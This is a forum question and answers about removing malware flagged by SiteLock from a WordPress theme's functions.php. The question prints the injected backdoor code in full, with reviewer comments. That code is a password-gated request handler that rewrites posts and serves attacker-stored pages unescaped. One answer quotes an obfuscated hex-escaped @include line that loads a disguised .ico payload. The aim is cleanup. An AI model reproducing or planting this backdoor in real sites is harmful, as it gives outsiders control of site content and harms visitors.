
How to get rid of “SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”

2019-07-24 12:30发布

问题:

<?php

// NOTE(review): this handler sits in front of the theme's own header comment further down and appears
// to be the injected code the scanner flagged, not part of the theme. Its markers (wp_cd_code,
// WP_URL_CD, a `datalist` table) resemble the publicly documented WP-VCD family -- confirm before
// relying on that label.
//
// Gate: the block runs for any request that carries `action` and a `password` equal to the hard-coded
// literal. In this listing the literal is empty (possibly redacted when posted -- compare with the
// on-disk file) and the comparison is the loose `==`, so this is not real authentication.
//
// Cleanup note: deleting this block from functions.php does not undo what it may already have written.
// Also review post_content for `<div id="wp_cd_code">` blocks and the `{prefix}datalist` table.
//
// mysql_escape_string() was removed in PHP 7.0; the branches that call it would raise a fatal error
// there, which suggests the host was running PHP 5.x when this was planted (inferred).
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
{
    switch ($_REQUEST['action'])
    {
        // `case ...;` (semicolon instead of colon) is valid PHP and behaves the same.
        // Prints one record per published post: its guid, its ID and the contents of any
        // `<div id="wp_cd_code">` block found in the post body.
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
            {
                $data['code'] = '';

                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                {
                    $data['code'] = $_[1];
                }

                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;

        // Rewrites the body of the post selected by the request's `id`: any existing wp_cd_code block is
        // stripped and, when `data` is non-empty, a new one holding the request's `data` is appended.
        case 'set_id_links';
            if (isset($_REQUEST['data']))
            {
                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                // stripcslashes() un-escapes C-style sequences in the supplied data before it is stored.
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                {
                    print "true";
                }
            }
            break;

        // Maintains rows in `{prefix}datalist`, a table that is not created anywhere in this listing:
        // `remove_page` deletes the row for `url`; otherwise a non-empty `content` inserts or updates the
        // row (title, keywords, description, content, full_content) keyed by `url`.
        case 'create_page';
            if (isset($_REQUEST['remove_page']))
            {
                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
            }
            elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
            {
                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
            }
            break;

        default: print "ERROR_WP_ACTION WP_URL_CD";
    }

    // Ends the request here, so nothing else in the file runs for a request that passed the gate.
    die("");
}

// NOTE(review): second half of what appears to be the injected code. It runs on every request that
// did not pass the gate above (no `action`/`password` check applies here): the requested URI is looked
// up in `{prefix}datalist`, and when exactly one row matches, the stored row is served in place of the
// normal page.
// The stored title, keywords, description and content are printed after stripslashes() only, with no
// HTML escaping, so whatever markup or script was stored is sent to the visitor as-is.
// Cleanup note: pages served this way live in the database, not in a file, so they survive a
// file-only cleanup until the `datalist` table is removed.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
    $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    // A truthy `full_content` flag means the stored content is emitted on its own, with no theme markup.
    if ($data -> full_content)
    {
        print stripslashes($data -> content);
    }
    else
    {
        // Otherwise the stored content is wrapped in a page built from the site's own head, search form,
        // sidebar and footer, with the stored title/keywords/description in the head.
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        // Explicitly asks crawlers to index the served page.
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }

    // Stops here so the rest of the file does not run for a matched URI.
    exit;
}

?><?php
/*
    Our portfolio:  http://themeforest.net/user/tagDiv/portfolio
    Thanks for using our theme!
    tagDiv - 2016
*/

/**
 * Load the speed booster framework + theme specific files
 */

// Theme bootstrap: the theme's own header comment starts just above this point, so everything from
// here on looks like original theme code rather than the injected handler.
// The require_once paths are relative and carry no directory prefix, so PHP resolves them through
// include_path and the including file's directory.

// load the deploy mode
require_once('td_deploy_mode.php');

// load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); // runs at priority 9 so that plugins hooking at the default priority of 10 can still update our APIs afterwards

// load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');

require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); // widgets

/*
 * mobile theme css generator
 * in wp-admin the main theme is loaded and the mobile theme functions are not included
 * required in td_panel_data_source
 * @todo - look for a more elegant solution (e.g. generate the css on request)
 */
require_once('mobile/includes/td_css_generator_mob.php');

/* ----------------------------------------------------------------------------
 * Woo Commerce
 */

// breadcrumb
/**
 * Filter callback for 'woocommerce_breadcrumb_defaults'.
 *
 * Takes no arguments, so whatever defaults the filter passes in are discarded and
 * replaced by the theme's own markup settings.
 *
 * @return array Breadcrumb settings: delimiter, wrap_before, wrap_after, before, after, home.
 */
function td_woocommerce_breadcrumbs() {
    $td_breadcrumb_settings = array();

    // separator icon placed between crumbs
    $td_breadcrumb_settings['delimiter'] = ' <i class="td-icon-right td-bread-sep"></i> ';

    // wrapper around the whole trail
    $td_breadcrumb_settings['wrap_before'] = '<div class="entry-crumbs" itemprop="breadcrumb">';
    $td_breadcrumb_settings['wrap_after'] = '</div>';

    // nothing is added around individual crumbs
    $td_breadcrumb_settings['before'] = '';
    $td_breadcrumb_settings['after'] = '';

    // label of the first crumb, translated in the 'woocommerce' text domain
    $td_breadcrumb_settings['home'] = _x('Home', 'breadcrumb', 'woocommerce');

    return $td_breadcrumb_settings;
}
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');

// use own pagination
if (function_exists('woocommerce_pagination') === false) {
    /**
     * Theme replacement for woocommerce_pagination(): echoes whatever
     * td_page_generator::get_pagination() returns. Only declared when no function
     * of that name exists yet.
     */
    function woocommerce_pagination() {
        $td_pagination_markup = td_page_generator::get_pagination();
        echo $td_pagination_markup;
    }
}

// Override theme default specification for product 3 per row

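// Number of products per shop page: 4 (the earlier comment here said 8, but the callback returns 4).
// A named callback replaces create_function(), which built its callback by eval()-ing a string, was
// deprecated in PHP 7.2 and was removed in PHP 8.0, where this line would stop the theme with a fatal error.
add_filter('loop_shop_per_page', 'td_loop_shop_per_page');

/**
 * Filter callback for 'loop_shop_per_page'.
 *
 * @param mixed $cols Value handed in by the filter; ignored.
 * @return int Always 4.
 */
function td_loop_shop_per_page($cols) {
    return 4;
}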

if (function_exists('woocommerce_output_related_products') === false) {
    /**
     * Theme replacement for woocommerce_output_related_products(): calls
     * woocommerce_related_products() with 4 posts per page, 4 columns and random
     * ordering. Only declared when no function of that name exists yet.
     */
    function woocommerce_output_related_products() {
        $td_related_args = array();
        $td_related_args['posts_per_page'] = 4;
        $td_related_args['columns'] = 4;
        $td_related_args['orderby'] = 'rand';

        woocommerce_related_products($td_related_args);
    }
}

/* ----------------------------------------------------------------------------
 * bbPress
 */
// change avatar size to 40px
/**
 * Filter callback that rebuilds a bbPress author avatar, swapping the 14px size for 40px.
 *
 * The incoming avatar markup is discarded; a fresh one is requested through get_avatar().
 *
 * @param string $author_avatar Avatar markup supplied by the filter (not used).
 * @param mixed  $topic_id      Topic identifier, normalised through bbp_get_topic_id().
 * @param mixed  $size          Requested size; a value loosely equal to 14 becomes 40.
 * @return string Avatar markup, or '' when no topic id could be resolved.
 */
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
    // loose comparison kept on purpose: the size may arrive as an int or a numeric string
    $td_avatar_px = ($size == 14) ? 40 : $size;

    $td_resolved_topic = bbp_get_topic_id( $topic_id );
    if ( empty( $td_resolved_topic ) ) {
        return '';
    }

    // anonymous topics are looked up by the stored e-mail, all others by author id
    if ( bbp_is_topic_anonymous( $td_resolved_topic ) ) {
        $td_avatar_owner = get_post_meta( $td_resolved_topic, '_bbp_anonymous_email', true );
    } else {
        $td_avatar_owner = bbp_get_topic_author_id( $td_resolved_topic );
    }

    return get_avatar( $td_avatar_owner, $td_avatar_px );
}

// register the same callback (priority 20, 3 arguments) on the three avatar filters
foreach (array('bbp_get_topic_author_avatar', 'bbp_get_reply_author_avatar', 'bbp_get_current_user_avatar') as $td_avatar_hook) {
    add_filter($td_avatar_hook, 'td_bbp_change_avatar_size', 20, 3);
}
unset($td_avatar_hook);

//add_action('shutdown', 'test_td');

/**
 * Debug helper: outside wp-admin, calls td_api_base::_debug_get_used_on_page_components().
 * The add_action('shutdown', ...) line that would hook it is commented out above.
 */
function test_td () {
    if (is_admin()) {
        return;
    }

    td_api_base::_debug_get_used_on_page_components();
}

/**
 * tdStyleCustomizer.js is required
 */
// Only when the TD_DEBUG_LIVE_THEME_STYLE constant is truthy: hook the demo panel into wp_footer and
// declare the function that prints it.
if (TD_DEBUG_LIVE_THEME_STYLE) {
    add_action('wp_footer', 'td_theme_style_footer');
        // new live theme demos
        /**
         * Prints the live theme demo panel: static markup plus one link per entry
         * of td_global::$demo_list.
         */
        function td_theme_style_footer() {
            ?>
            <div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
                <div class="td-skin-body">
                    <div class="td-skin-wrap">
                        <div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
                            <div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
                            <div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
                        <div class="td-skin-container td-skin-content">
                            <div class="td-demos-list">
                                <?php
                                // maps each demo's display text to its id; the id is reused in the CSS class below
                                $td_demo_names = array();

                                // NOTE(review): demo_url and $demo_id are echoed into attributes without
                                // esc_url()/esc_attr(); td_global::$demo_list is defined outside this
                                // listing -- confirm it only ever holds static theme configuration.
                                foreach (td_global::$demo_list as $demo_id => $stack_params) {
                                    $td_demo_names[$stack_params['text']] = $demo_id;
                                    ?>
                                    <div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div>
                                <?php } ?>
                                <div class="clearfix"></div>
                            </div>
                        </div>
                        <div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
                    </div>
                </div>
                <div class="clearfix"></div>
                <div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div>
                <div class="td-screen-demo" data-width-preview="380"></div>
                <div class="td-screen-demo-extend"></div>
            </div>
            <?php
    }
}

//print_r(td_global::$all_theme_panels_list);

My hosting provider's virus scanner reports a virus in my theme's functions.php file. I am not sure how to delete the code without affecting the website. Please help me clear the malicious code flagged as "SiteLock-PHP-FILEHACKER-of.UNOFFICIAL" from this functions.php.

回答1:

I've been struggling with this kind of virus, and what I did to solve it was:

  1. Analyze the whole directory.

  2. Open each infected file with vim or nano; you should see the injected code. Delete just that code and your file should be OK.

  3. Repeat for all the infected files. Some of them are .zip files that were brought in by the virus; delete those and keep the files you originally had.

As a recommendation, you should keep your plugins and themes updated.

Hope it works. It might not be the most efficient way, but it worked for me.



回答2:

These viruses add one line of code to most of your files; such files are called affected files.

In my case, the affected files all have this line in common:

@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x66av\x69co\x6e_f\x389a\x617.\x69co";

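When you remove this line from all these files, you are free from the virus/malware infection. The line itself only loads another file: the hex-escaped string decodes to a `favicon_….ico` path under `wp-includes/js/jcrop/`, which presumably holds the actual payload, so that file should be deleted as well.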